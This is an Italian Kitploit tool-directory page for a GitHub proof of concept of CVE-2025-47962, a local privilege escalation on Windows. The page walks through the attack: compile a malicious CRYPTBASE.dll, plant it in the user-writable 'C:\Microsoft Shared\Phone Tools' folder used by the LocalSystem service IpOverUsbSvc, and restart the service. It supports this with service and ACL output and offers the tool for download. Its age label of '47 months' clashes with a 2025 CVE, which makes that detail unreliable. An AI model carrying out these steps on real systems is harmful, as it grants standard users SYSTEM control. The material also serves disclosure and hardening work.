Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-47962-POC | Kitploit
Strumenti/GitHubGitHub/q1uf3ng/cve-2025-47962-poc
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitMovimento LateraleBinary Exploitation
GitHubq1uf3ng/cve-2025-47962-poc

CVE-2025-47962-POC

Vedi Repository
47 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-47962-POC

Procedimento di riproduzione: i686-w64-mingw32-gcc -shared -o CRYPTBASE.dll poc.c -lkernel32

copy CRYPTBASE.dll "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\CRYPTBASE.dll"

net stop IpOverUsbSvc net start IpOverUsbSvc Immagine

Spiegazione: IpOverUsbSvc

root@kitploit:~
sc.exe qc IpOverUsbSvc

SERVICE_NAME: IpOverUsbSvc
TYPE               : 10  WIN32_OWN_PROCESS
START_TYPE         : 2   AUTO_START
BINARY_PATH_NAME   : "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe"
SERVICE_START_NAME : LocalSystem

Viene eseguito con privilegi LocalSystem. L'eseguibile si trova nella directory C:\Microsoft Shared, sulla quale gli utenti standard dispongono delle autorizzazioni di controllo completo. È stato scoperto che gli utenti comuni possono scrivere file nella directory del servizio SYSTEM. Quindi monitorare la DLL Immagine Immagine Immagine

Le autorizzazioni per la directory C:\Microsoft Shared\ creata durante l'installazione di Windows SDK sono configurate in modo non corretto:

root@kitploit:~
C:\Microsoft Shared BUILTIN\Users:(I)(OI)(CI)(F)
                    NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(M)
Scarica lo strumento